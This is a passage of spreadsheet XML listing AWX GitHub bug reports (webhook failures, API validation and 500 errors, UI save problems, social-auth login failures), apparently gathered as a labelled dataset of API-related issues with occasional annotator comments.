    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Trying to send a (test) notification to a Mattermost Channel fails with ``` mattermostinfo: Notification failed. Error sending notification mattermost: {"id":"api.webhook.incoming.error","message":"Could not decode the multipart payload of incoming webhook.","detailed_error":"","request_id":"&lt;request ID&gt;","status_code":400} ``` ##### ENVIRONMENT * AWX version: 11.2.0 * AWX install method: docker on linux * Ansible version: 2.9.7 * Operating System: CentOS 7.8 * Web Browser: Chrome,Chromium,Firefox * Mattermost Server Version: 5.22.1 ##### STEPS TO REPRODUCE - Create an incomming webhook - Create a mattermost notification - Send a test notification ##### EXPECTED RESULTS Having a notification in the Channel ##### ACTUAL RESULTS Sending failed with above error message ##### ADDITIONAL INFORMATION The error message in the mattermost log shows ``` {"level":"error","ts":1591342011.6592789,"caller":"mlog/log.go:175","msg":"Could not decode the multipart payload of incoming webhook.","path":"/ hooks/&lt;hook ID&gt;","request_id":"&lt;request ID&gt;","ip_addr":"&lt;IP Address&gt;","user_id":"","method":"POST","err_where":" incomingWebhook","http_code":400,"err_details":"mime: no media type"} ``` --- edit: some ID removed in the log sample, mattermost server version added</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/7665</t>
  </si>
  <si>
    <t>API should not accept modification of local_path for nom-manual projects</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY The API will accept a PATCH to edit `local_path` for a git project, but the change will not take effect. Some version of a 400 error would be preferable to this. This is a valid field to edit in the case of manual projects, so there's no valid justification that it's "not a field". ##### ENVIRONMENT * AWX version: 13.0.0 * AWX install method: N/A * Ansible version: N/A ##### STEPS TO REPRODUCE PATCH `/api/v2/projects/6/` ```json { "description": "asdf", "local_path": "_6__demo_project_edited" } ``` ##### EXPECTED RESULTS One of: - the local_path value changes to "_6__demo_project_edited" - get error ##### ACTUAL RESULTS No error description changes to "asdf" the `local_path` remains at prior value of "_6__demo_project"</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/7798</t>
  </si>
  <si>
    <t>Exported Workflow Job Templates refer to inventories by id instead of natural key</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - The API endpoint for a workflow_job_template does not provide a representation that includes the natural key of the related Inventory, which is problematic when migrating it between different instances of AWX/Tower. ##### SUMMARY The API endpoint for a workflow_job_template does not provide a representation that includes the natural key of the related Inventory, if set. Instead, it just uses the numerical `id`, which is problematic when attempting to export and import the workflow between different instances of AWX/Tower, since the API will attempt to use the given numerical `id` to associate an inventory to the import workflow, which will most likely be different on the target instance of AWX/Tower. This behaviour is dangerous because if the target instance of AWX/Tower has a different inventory with the same numerical `id`, no warnings will be raised, causing the workflow to be associated with the wrong template. ##### ENVIRONMENT * AWX version: 3.7.1 (Tower) * AWX install method: openshift * Ansible version: 2.9.9 * Operating System: OpenShift * Web Browser: Google Chrome ##### STEPS TO REPRODUCE 1. Export a `workflow_job_template` that is associated with an inventory 2. Observe the value of the `workflow_job_templates.[].inventory` attribut in the exported YAML. ##### EXPECTED RESULTS It is reasonable to expect that the following YAML document would be generated for an example workflow_job_template object. ```yaml workflow_job_templates: - allow_simultaneous: true ask_inventory_on_launch: false ask_limit_on_launch: false ask_scm_branch_on_launch: true ask_variables_on_launch: true description: My VM provisioning extra_vars: '' inventory: name: my-vms type: inventory organization: name: ACME type: organization limit: null name: my-workflow natural_key: name: my-workflow organization: name: ACME type: organization type: workflow_job_template organization: name: ACME type: organization related: notification_templates_approvals: [] notification_templates_error: [] notification_templates_started: [] notification_templates_success: [] schedules: [] survey_spec: {} workflow_nodes: [] scm_branch: null survey_enabled: false webhook_credential: null ``` The document above, when imported, will generate the association with the inventory correctly on Tower 3.7.1. This is the expected behaviour, relying on the natural key of the object instead of the `id`. ##### ACTUAL RESULTS YAML such as the following is generated: ```yaml workflow_job_templates: - allow_simultaneous: true ask_inventory_on_launch: false ask_limit_on_launch: false ask_scm_branch_on_launch: true ask_variables_on_launch: true description: My VM provisioning extra_vars: '' inventory: 29 limit: null name: my-workflow natural_key: name: my-workflow organization: name: ACME type: organization type: workflow_job_template organization: name: ACME type: organization related: notification_templates_approvals: [] notification_templates_error: [] notification_templates_started: [] notification_templates_success: [] schedules: [] survey_spec: {} workflow_nodes: [] scm_branch: null survey_enabled: false webhook_credential: null ``` Notice that the `inventory` key has the value corresponding to the unique id on the source AWX/Tower server. This is not guaranteed to be the same on the target server when the object will be imported.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/8202</t>
  </si>
  <si>
    <t>Launching job with vault password 400s when default machine cred is replaced</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Really odd behavior that I came across while building out credential prompting in the new UI. This can be reproduced via the API browser though. I created a JT with a default machine credential (that prompted for some passwords) and a default vault credential (that prompted for password). If I swap the machine credential for one that does not prompt for a password then the API responds with a 400 on launch complaining about the vault password: `{"passwords_needed_to_start":["vault_password.A"]}` In the example below credential with ID = 1 is the machine credential that prompts for ssh and become passwords. Credential ID = 2 is the machine credential that does not prompt for passwords. Credential ID = 4 is the vault credential that prompts for password. A normal launch without changing credentials: ![good_launch](https://user-images.githubusercontent.com/9889020/93922608-26ad8000-fce0-11ea-8b61-8604ec329d83.gif) A launch where I change the machine credential: ![bad_launch](https://user-images.githubusercontent.com/9889020/93922684-493f9900-fce0-11ea-93a5-891b46041a13.gif)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/8305</t>
  </si>
  <si>
    <t>500 error when attempting to delete workflow approval</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY ![delete_wf_approval](https://user-images.githubusercontent.com/9889020/94853438-67e91280-03f9-11eb-9233-63c15e611f70.gif) I haven't tried this with a pending workflow approval but I suspect it would yield the same result. We don't have an interface that interacts with this endpoint in the UI so maybe this has been around for a while? I'm exploring adding an interface for listing out _all_ workflow approvals so that a user could go back and see who approved/denied what in the past. This interface will support deletion if the API allows it. ##### STEPS TO REPRODUCE 1) Create a workflow with an approval step 2) Launch workflow 3) Approve step 4) Attempt to delete workflow approval via API ##### EXPECTED RESULTS Successful delete ##### ACTUAL RESULTS 500 error ``` Request Method: | DELETE -- | -- https://localhost:8043/api/v2/workflow_approvals/3/ 2.2.16 AttributeError 'NoneType' object has no attribute 'objects' ./awx/main/models/unified_jobs.py in get_event_queryset, line 994 /venv/awx/bin/uwsgi 3.6.8 ['/venv/awx/lib/python3.6/site-packages/git/ext/gitdb', '.', '', '/venv/awx/lib64/python36.zip', '/venv/awx/lib64/python3.6', '/venv/awx/lib64/python3.6/lib-dynload', '/usr/lib64/python3.6', '/usr/lib/python3.6', '/venv/awx/lib/python3.6/site-packages', '/venv/awx/lib/python3.6/site-packages/gitdb/ext/smmap'] Thu, 1 Oct 2020 19:17:11 +0000 ```</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/8641</t>
  </si>
  <si>
    <t>Cannot disable a schedule for a JT with a missing project (and it keeps running)</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY It's fairly easy to get into a state where a schedule is enabled with an invalid JT, and the schedule cannot be turned off, due to a validation error on the JT. Even though the schedule is invalid, it keeps running on the schedule interval, and its jobs fail obviously. ##### ENVIRONMENT * AWX version: 15.0.1 ##### STEPS TO REPRODUCE Create a JT Create a 1-minute schedule for that JT Delete the project used by the JT (or its inventory) Try to disable the schedule in the UI ##### EXPECTED RESULTS Schedule turns off ##### ACTUAL RESULTS 400 response ```json {"resources_needed_to_start":["Job Template project is missing or undefined.","Job Template inventory is missing or undefined."]} ``` This is what you get hitting the disable button in the UI, which performs a PATCH to the schedule, setting the "enabled" field to False, and it includes the rest of the data. The issue is on the API here, because the request made by the UI seems reasonable, and should be expected to succeed. Perhaps the API should only error on this type of validation if the schedule is being _enabled_. ##### ADDITIONAL INFORMATION Similar to https://github.com/ansible/awx/issues/7521 by @chrismeyersfsu, seen in test runs, and creates background processing since the 1-minute schedule continues to run for the duration that the server is up.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/8777</t>
  </si>
  <si>
    <t>awx collection workflow approval with success node fail</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY apply success node to approval_node fail because success_nodes not exists in /api/v2/workflow_approval_templates/ "msg": "The requested object could not be found at /api/v2/workflow_approval_templates/280/success_nodes/." ##### ENVIRONMENT * AWX version: 15.0.1 * AWX install method: docker * Ansible version: 2.8.7 * Operating System: redhat * Web Browser: chrome ##### STEPS TO REPRODUCE approval_node with success_node ##### EXPECTED RESULTS ansible tasks changed ##### ACTUAL RESULTS ansible fail ##### ADDITIONAL INFORMATION</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/8838</t>
  </si>
  <si>
    <t>[ui_next] Inventory update Delete hits wrong endpoint</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Inventory update Delete hits wrong endpoint. ```I try to delete the SCM inventory update from the job page. It fails with an error about the inventory, but it shouldnt be deleting the inventory, it should only be deleting the update.``` ##### ENVIRONMENT * AWX version: 12/10 ##### MORE INFO Also, thats not the right number for the inventory, 66 is the ID of the inventory update. ![Screen Shot 2020-12-10 at 3 52 00 PM](https://user-images.githubusercontent.com/12446869/101828548-b30d5900-3aff-11eb-8a7a-d10208387cbd.png)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/9176</t>
  </si>
  <si>
    <t>Optional textarea survey fields not optional when min length &gt; 0</t>
  </si>
  <si>
    <t>&lt;!-- Issues are for **concrete, actionable bugs and feature requests** only - if you're just asking for debugging help or technical support, please use: - http://webchat.freenode.net/?channels=ansible-awx - https://groups.google.com/forum/#!forum/awx-project We have to limit this because of limited volunteer time to respond to issues! --&gt; ##### ISSUE TYPE - Bug Report ##### SUMMARY Text area survey fields that are optional (required checkbox unchecked) are not optional if the minimum length is greater than zero. Upon launching, an error message displays saying the field must be X characters. In versions &lt;= 15.0.1, an optional field with a min length of one could be left blank and the variable would not be defined or set. In 17.0.0, awx attempts to define the variable regardless if the field is optional or not. ##### ENVIRONMENT * AWX version: 17.0.1 * AWX install method: openshift, minishift, docker on linux, docker for mac, boot2docker * Ansible version: X.Y.Z * Operating System: * Web Browser: ##### STEPS TO REPRODUCE Create a survey with an optional text area field Set the min length to 1 Attempt to launch the job leaving the survey field blank ##### EXPECTED RESULTS When min length is greater than zero and the field is optional, the variable should be left undefined when the survey field is blank and the job should launch. ##### ACTUAL RESULTS Launch fails with a message saying the field must be at least one character. ##### ADDITIONAL INFORMATION &lt;!-- Include any links to sosreport, database dumps, screenshots or other information. --&gt;</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/9222</t>
  </si>
  <si>
    <t>Passing a bad lookup type modifier in api request triggers 500 error</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Send a request like `/api/v2/jobs/?id__iexact=1` &lt;img width="1680" alt="Screen Shot 2021-02-03 at 12 28 26 PM" src="https://user-images.githubusercontent.com/9889020/106785392-56b84880-661b-11eb-9288-fa50845636f7.png"&gt; `iexact` isn't supported on the `id` field. What I'm hoping for is a nice 4xx error that says that modifier is not supported. The impetuous for this issue came from https://github.com/ansible/awx/issues/7834. The advanced search in the UI allows the user to select from a static list of modifiers in the `Advanced` section. I left that issue open as a UI enhancement to attempt to trim that list down to only modifiers that will work with a particular field.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/9373</t>
  </si>
  <si>
    <t>[ui_next] Silent error when creating or editing an inventory source to 'Update on launch' and 'Update on project update'</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY When creating or editing an inventory which is sourced from a project, if the 'Update on launch' and 'Update on project update' options are selected, the form does not save and the API's error response does not get displayed in the UI. ``` {"update_on_launch":["Cannot update SCM-based inventory source on launch if set to update on project update. Instead, configure the corresponding source project to update on launch."]} ``` I think the fix for this should be two parts: 1. Update the tooltips for both toggles to note that they cannot be used simultaneously 2. Surface API errors to user on save, generally. ##### STEPS TO REPRODUCE 1. Create an Inventory with type 'Sourced from a Project' 2. Select both 'Update on launch' or 'Update on project update' 3. Save Note: error in console</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/9441</t>
  </si>
  <si>
    <t>Advanced search for type returns 400</t>
  </si>
  <si>
    <t>&lt;!-- Issues are for **concrete, actionable bugs and feature requests** only - if you're just asking for debugging help or technical support, please use: - http://webchat.freenode.net/?channels=ansible-awx - https://groups.google.com/forum/#!forum/awx-project We have to limit this because of limited volunteer time to respond to issues! --&gt; ##### ISSUE TYPE - Bug Report ##### SUMMARY Trying to do an advanced search by `type` the results are always `ExecutionEnvironment has no field named 'type'`: ![image](https://user-images.githubusercontent.com/12464858/109544586-83d70a00-7aa6-11eb-994c-dedcbce8801a.png)</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/9472</t>
  </si>
  <si>
    <t>awx.main.utils.common.get_ansible_version breaks with ansible-core</t>
  </si>
  <si>
    <t>&lt;!-- Issues are for **concrete, actionable bugs and feature requests** only - if you're just asking for debugging help or technical support, please use: - http://webchat.freenode.net/?channels=ansible-awx - https://groups.google.com/forum/#!forum/awx-project We have to limit this because of limited volunteer time to respond to issues! --&gt; ##### ISSUE TYPE - Bug Report ##### SUMMARY &lt;!-- Briefly describe the problem. --&gt; The `awx.main.utils.common.get_ansible_version` helper breaks with new `ansible --version` when ansible-core is installed. This also changes the format the `api/v2/config` returns for the `ansible_version` field. What breaks tools that relies on this field to check the current ansible version used by AWX. ##### ENVIRONMENT * AWX version: devel * AWX install method: vm * Ansible version: ansible-core 2.11 * Operating System: RHEL8.3 * Web Browser: ##### STEPS TO REPRODUCE &lt;!-- Please describe exactly how to reproduce the problem. --&gt; Install AWX with ansible-core and perform a GET request to `/api/v2/config` and check the `ansible_version` field format. ##### EXPECTED RESULTS &lt;!-- What did you expect to happen when running the steps above? --&gt; The ansible version format should be something like `X.Y.Z` (format capable to be parsed by tools like `distutils.version.LooseVersion`) ##### ACTUAL RESULTS &lt;!-- What actually happened? --&gt; Returning something like `"ansible_version": "[core 2.11.0.dev0]"` ##### ADDITIONAL INFORMATION &lt;!-- Include any links to sosreport, database dumps, screenshots or other information. --&gt; Output of `ansible --version` for ansible-core 2.11: ```console $ ansible --version ansible [core 2.11.0b1] config file = /home/elyezer/code/ansible/ansible-core/ansible.cfg configured module search path = ['/home/elyezer/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /home/elyezer/.virtualenvs/ansible-core/lib/python3.9/site-packages/ansible ansible collection location = /home/elyezer/.ansible/collections:/usr/share/ansible/collections executable location = /home/elyezer/.virtualenvs/ansible-core/bin/ansible python version = 3.9.0 (default, Oct 6 2020, 00:00:00) [GCC 10.2.1 20200826 (Red Hat 10.2.1-3)] jinja version = 2.11.3 libyaml = True ``` For ansible 2.9: ``` ansible 2.9.16 config file = /home/elyezer/code/ansible/ansible/ansible.cfg configured module search path = ['/home/elyezer/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /home/elyezer/.virtualenvs/ansible/lib/python3.9/site-packages/ansible executable location = /home/elyezer/.virtualenvs/ansible/bin/ansible python version = 3.9.0 (default, Oct 6 2020, 00:00:00) [GCC 10.2.1 20200826 (Red Hat 10.2.1-3)] ```</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/9669</t>
  </si>
  <si>
    <t>Cannot save Miscellaneous System Settings on new cluster</t>
  </si>
  <si>
    <t>&lt;!-- Issues are for **concrete, actionable bugs and feature requests** only - if you're just asking for debugging help or technical support, please use: - http://webchat.freenode.net/?channels=ansible-awx - https://groups.google.com/forum/#!forum/awx-project We have to limit this because of limited volunteer time to respond to issues! --&gt; ##### ISSUE TYPE - Bug Report ##### SUMMARY I cannot save my changes to the Miscellaneous System settings of a newly created AWX Tower install. I receive no UI feedback but the network tab shows `{"CUSTOM_VENV_PATHS":["Expected list of strings but got &lt;class 'str'&gt; instead."]}`. I have not attempted to set up custom venvs, nor can I find that setting in the UI. ##### ENVIRONMENT * AWX version: 18.0.0 * AWX install method: minikube following https://github.com/ansible/awx/blob/devel/INSTALL.md * Ansible version: unknown * Operating System: ArchLinux * Web Browser: Firefox 87 ##### STEPS TO REPRODUCE 1. Install a new instance of AWX using the instructions given in the INSTALL.md file 2. Log in as admin 3. Edit settings under /#/settings/miscellaneous_system/details 4. Attempt to change the base url from "https://towerhost" to my actual base URL. 5. Hit save ##### EXPECTED RESULTS Settings save and UI reverts to the details page. ##### ACTUAL RESULTS No UI feedback at all, following error in network tab. ``` {"CUSTOM_VENV_PATHS":["Expected list of strings but got &lt;class 'str'&gt; instead."]} ``` The PATCH request is sent to https://MYDOMAIN/api/v2/settings/all/ and has the following relevant data: ``` "CUSTOM_VENV_PATHS":"[]" ``` ##### ADDITIONAL INFORMATION &lt;!-- Include any links to sosreport, database dumps, screenshots or other information. --&gt;</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/9772</t>
  </si>
  <si>
    <t>Job output paginator can make requests to page 0 of job_events endpoint, resulting in unhandled 404</t>
  </si>
  <si>
    <t>It's possible for the job output paginator to produce a request to page 0, which returns an unhandled 404: ![Screenshot from 2021-03-31 11-48-29](https://user-images.githubusercontent.com/9753817/113173073-0b837600-9217-11eb-9962-eccdd4e1785f.png)</t>
  </si>
  <si>
    <t xml:space="preserve">the endpoint may return 4XX , so potential bug </t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/9905</t>
  </si>
  <si>
    <t>Unable to cancel job - method POST not allowed - awx19</t>
  </si>
  <si>
    <t>&lt;!-- Issues are for **concrete, actionable bugs and feature requests** only - if you're just asking for debugging help or technical support, please use: - http://webchat.freenode.net/?channels=ansible-awx - https://groups.google.com/forum/#!forum/awx-project We have to limit this because of limited volunteer time to respond to issues! --&gt; ##### ISSUE TYPE - Bug Report ##### SUMMARY I had an inventory sync job that was stuck. Upon trying to cancel it, I got an error saying `Method "POST" not allowed` This is a refile of #9714 as the issue is still not fixed. ##### ENVIRONMENT * AWX version: 19.0.0 * AWX install method: minishift * Ansible version: * Operating System: Debian 10 * Web Browser: Chrome ##### STEPS TO REPRODUCE 1. Get a stuck job? 2. Try to cancel job. ##### EXPECTED RESULTS job to cancel ##### ACTUAL RESULTS ``` POST /api/v2/inventory_updates/11/cancel/ 405 Method "POST" not allowed. ``` ![image](https://user-images.githubusercontent.com/1826947/114759279-f7b63480-9d2b-11eb-96ff-2d5669e4c4a1.png) ##### ADDITIONAL INFORMATION &lt;!-- Include any links to sosreport, database dumps, screenshots or other information. --&gt;</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/10008</t>
  </si>
  <si>
    <t>awx.awx.tower_job_launch tags are not properly passed to API</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY If you are using awx.awx.tower_job_launch to launch a job-/workflowtemplate in AWX and you pass tags to the job launch they will be ignored. Against expectations all tasks are executed not only those with the provided tags ##### ENVIRONMENT * AWX version: Tower 3.8.2 * Ansible version: Ansible 2.9.13 * Operating System: RHEL 8.3 ##### STEPS TO REPRODUCE Create a playbook similar to this: ``` - hosts: localhost gather_facts: no environment: TOWER_USERNAME: "&lt;&lt;INPUT TOWER USERNAME HERE&gt;&gt;" TOWER_HOST: "&lt;&lt;INPUT TOWER HOST HERE&gt;&gt;" TOWER_PASSWORD: "&lt;&lt;INPUT TOWER USER PASSWORD HERE&gt;&gt;" vars: ansible_connection: local tasks: - name: Launch a job template with a tag on remote Tower instance awx.awx.tower_job_launch: job_template: "test_template" inventory: "test_inventory" tags: - example_tag ``` Create a second playbook named "test_template" with two random tasks. One needs to be tagged with "example_tag" ##### EXPECTED RESULTS Only the task tagged with "example_tag" will be executed ##### ACTUAL RESULTS All tasks will be executed ##### ADDITIONAL INFORMATION The error occurs because [tower_job_launch.py](https://github.com/ansible/awx/blob/devel/awx_collection/plugins/modules/tower_job_launch.py) passes the wrong post data to the api. The tags have to be provided under key "job_tags". This can be found in [API documentation](https://docs.ansible.com/ansible-tower/latest/html/towerapi/api_ref.html#/Job_Templates/Job_Templates_job_templates_launch_read). Certainly the module passes the tags with the key "tags" which is wrong I think the follwing code needs to be adjusted: https://github.com/ansible/awx/blob/devel/awx_collection/plugins/modules/tower_job_launch.py#L184 The correct line should be: ` optional_args['job_tags'] = module.params.get('tags')` I will test the suggestion on monday and report the result.</t>
  </si>
  <si>
    <t xml:space="preserve">case in correct request data </t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/10118</t>
  </si>
  <si>
    <t>Jobs on systems missing EEs throw an error instead of failing</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY If the user fails to have an execution environment available, the dispatcher will raise an error and a traceback will go to the logs, but the feedback provided to the user via the UI or API is mysterious. ##### ENVIRONMENT * AWX version: 19.1.0 ##### STEPS TO REPRODUCE 1. deliberately delete all EEs, including any installed managed-by-tower EEs 2. trigger a project update ##### EXPECTED RESULTS If there are no EEs available, the job should fail with an explicit reason provided in the job output in the UI. ##### ACTUAL RESULTS job output: ![image(4)](https://user-images.githubusercontent.com/685957/117202438-d17c3580-adbb-11eb-8d5e-ab255aefeacc.png) in the logs: ``` tools_awx_1 | awx-dispatcher stdout | 2021-05-05 19:46:16,092 ERROR [c77b9784] awx.main.tasks project_update 17 (running) Exception occurred while running task tools_awx_1 | awx-dispatcher stdout | Traceback (most recent call last): tools_awx_1 | awx-dispatcher stdout | File "/awx_devel/awx/main/tasks.py", line 1316, in run tools_awx_1 | awx-dispatcher stdout | env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files) tools_awx_1 | awx-dispatcher stdout | File "/awx_devel/awx/main/tasks.py", line 1883, in build_env tools_awx_1 | awx-dispatcher stdout | env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files) tools_awx_1 | awx-dispatcher stdout | File "/awx_devel/awx/main/tasks.py", line 997, in build_env tools_awx_1 | awx-dispatcher stdout | ee_cred = self.instance.execution_environment.credential tools_awx_1 | awx-dispatcher stdout | AttributeError: 'NoneType' object has no attribute 'credential' tools_awx_1 | awx-dispatcher stdout | ```</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/10123</t>
  </si>
  <si>
    <t>AWX 19.1.0 - Job settings cannot be saved (/worker-json.js returns 404)</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### SUMMARY Job settings cannot be saved, probably due to the `worker-json.js` returning 404. ##### ENVIRONMENT * AWX version: 19.1.0 * AWX install method: minikube * OS: Debian * Browser: Chromium: 90.0.4430.93 (Official Build) (64-bit) ##### STEPS TO REPRODUCE - Go the Settings &gt; Jobs settings &gt; Edit - Tweak a setting - Hit Save ##### EXPECTED RESULTS - The settings are saved succesfully ##### ACTUAL RESULTS - The settings never get updated, the save button doesn't do anything ##### ADDITIONAL INFORMATION I am not sure what debug information would help, but I will be happy to provide any if required</t>
  </si>
  <si>
    <t xml:space="preserve">""This is a UI only problem I could patch the Job settings by the API one of the comment had this </t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/10152</t>
  </si>
  <si>
    <t>AWX 19.1: management jobs can not be scheduled</t>
  </si>
  <si>
    <t>&lt;!-- Issues are for **concrete, actionable bugs and feature requests** only - if you're just asking for debugging help or technical support, please use: - http://webchat.freenode.net/?channels=ansible-awx - https://groups.google.com/forum/#!forum/awx-project We have to limit this because of limited volunteer time to respond to issues! --&gt; ##### ISSUE TYPE - Bug Report ##### SUMMARY I'm trying to edit the schedules for the management jobs, but the (existing) schedules are prefilled with values that can't be saved?? ##### ENVIRONMENT * AWX version: 19.1.0 * AWX install method: k3s on debian buster, deployed with awx-operator 0.9.0 * Ansible version: n/a at this point * Operating System: whatever is used inside the containers? * Web Browser: any ##### STEPS TO REPRODUCE 1. click "management jobs" 2. click any one job of the four 3. edit or create a schedule 4. observe "start time" is prefilled with "NaN-NaN-NaNTNaN:NaN:NaN" even if the job had been edited and/or run before already 5. observe how it is impossible to save the schedule unless you manually change the start time to some value that makes sense ##### EXPECTED RESULTS I'd expect the "start time" to be either 01-01-1970T00:00:00 or the time the AWX instance was deployed before its first run, then the time&amp;date of the first run ##### ACTUAL RESULTS Schedule can not be saved. ##### ADDITIONAL INFORMATION</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/10383</t>
  </si>
  <si>
    <t>Unexpected api config requests on logout</t>
  </si>
  <si>
    <t>##### ISSUE TYPE - Bug Report ##### STEPS TO REPRODUCE - logout using the top-nav dropdown ##### EXPECTED RESULTS no requests are made to the config endpoint on logout ##### ACTUAL RESULTS requests are made to config endpoint, 400 errors</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/10681</t>
  </si>
  <si>
    <t>API strings are not being compiled</t>
  </si>
  <si>
    <t>### Summary In our move to ui_next, the `make languages` target was no longer called when compiling the UI. This means that the API strings (think help_text in OPTIONS requests) are no longer being compiled and thus are not displayed in the client's browser. ### AWX version devel ### Web browser Chrome ### Steps to reproduce 1. Start the dev env - `make docker-compose` 2. Change your browser preferences to default to `ja` as your locale 3. Navigate to `api/v2/settings/authentication` and click OPTIONS to see the untranslated strings 4. Run the following to compile API strings: ``` $ python tools/scripts/compilemessages.py ``` 5. Restart your containers 6. Observe the strings are now translated ### Expected results ![image](https://user-images.githubusercontent.com/11698892/126224196-f76da94a-f6ca-4306-9187-b2db8326ab5c.png) ### Actual results ![image](https://user-images.githubusercontent.com/11698892/126224326-2461395d-6f14-4eaf-b34b-58a2108c0354.png) Sidenote, there is also a `fr` string that is throwing a compilation error which I will fix. ### Additional information We may also be able to lose our `compilemessages.py` file in favor of using the django build-in command.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/10879</t>
  </si>
  <si>
    <t>Errors caused by Social Auth Organization and Team Mapping; Users unable to login</t>
  </si>
  <si>
    <t>### Please confirm the following - [X] I agree to follow this project's [code of conduct](http://docs.ansible.com/ansible/latest/community/code_of_conduct.html). - [X] I have checked the [current issues](https://github.com/ansible/awx/issues) for duplicates. - [X] I understand that AWX is open source software provided for free and that I am not entitled to status updates or other assurances. ### Summary Attempting to configure Social Organization/Team Mapping prevents social-auth users from logging in. `awx-web` and postgres show errors. If ORGANIZATION_MAP and TEAM_MAP are reverted to default/empty, user is able to login. ### AWX version 19.2.2 ### Installation method kubernetes ### Modifications yes ### Ansible version _No response_ ### Operating system _No response_ ### Web browser Chrome ### Steps to reproduce 1. Fresh AWX 19.2.2 installation via awx-operator (0.12.0) with `create_preload_data: 'false'` 2. Log in as Admin; Configure Github Organization OAuth2 Social Auth ( do not configure org/team maps ) ```json { "SOCIAL_AUTH_GITHUB_ORG_CALLBACK_URL": "https://my-awx-install.com/sso/complete/github-org/", "SOCIAL_AUTH_GITHUB_ORG_KEY": "&lt;redacted&gt;", "SOCIAL_AUTH_GITHUB_ORG_SECRET": "$encrypted$", "SOCIAL_AUTH_GITHUB_ORG_ORGANIZATION_MAP": null, "SOCIAL_AUTH_GITHUB_ORG_TEAM_MAP": null } ``` 3. Validate Step 2 configs by logging in via Github Org Social Auth 4. Log out. 5. Login as Admin; Configure Org/Team Maps (I tried this in both the Global and GitHub Org specific configs) ```json { "SOCIAL_AUTH_GITHUB_ORG_CALLBACK_URL": "https://my-awx-install.com/sso/complete/github-org/", "SOCIAL_AUTH_GITHUB_ORG_KEY": "&lt;redacted&gt;", "SOCIAL_AUTH_GITHUB_ORG_SECRET": "$encrypted$", "SOCIAL_AUTH_GITHUB_ORG_NAME": "MyOrg", "SOCIAL_AUTH_GITHUB_ORG_ORGANIZATION_MAP": { "MyOrg": { "users": [ "me@example.com" ], "admins": [ "admin@example.com" ], "remove_users": true, "remove_admins": true } }, "SOCIAL_AUTH_GITHUB_ORG_TEAM_MAP": { "operations-team": { "remove": true, "organization": "MyOrg", "users": [ "me@example.com" ] } } } ``` 6. Attempt to login as user; Get redirected to login page; Observe error awx-web and postgres error logs ### Expected results Organizations specified by valid Social Auth Org map(s) are created automatically Teams specified by valid Social Auth Team map(s) are created automatically Users are able to login as specified by Social Auth Org/Team maps ### Actual results User was not able to login following Org/Map configuration. Organization and Teams were not created on our behalf. `postgres` errors ```bash 2021-08-13 21:39:42.438 UTC [2886] STATEMENT: INSERT INTO "main_organizationgalaxycredentialmembership" ("organization_id", "credential_id", "position") VALUES (1, NULL, NULL) RETURNING "main_organizationgalaxycredentialmembership"."id" 2021-08-13 21:39:42.438 UTC [2886] ERROR: null value in column "credential_id" violates not-null constraint 2021-08-13 21:39:42.438 UTC [2886] DETAIL: Failing row contains (1, null, null, 1). ``` `awx-web` errors ``` 2021-08-13 21:39:42,440 ERROR [c6496ec03db747d3a7800f653acd316b] social null value in column "credential_id" violates not-null constraint DETAIL: Failing row contains (1, null, null, 1). . ``` ### Additional information * Installed via awx-operator with `create_preload_data: false` * Prior to opening this issue, I've also attempted this against 19.3.0 to no success.</t>
  </si>
  <si>
    <t>https://github.com/ansible/awx/issues/11017</t>
  </si>
  <si>
    <t>Unable to use ansible_facts for smart inventory source</t>
  </si>
  <si>
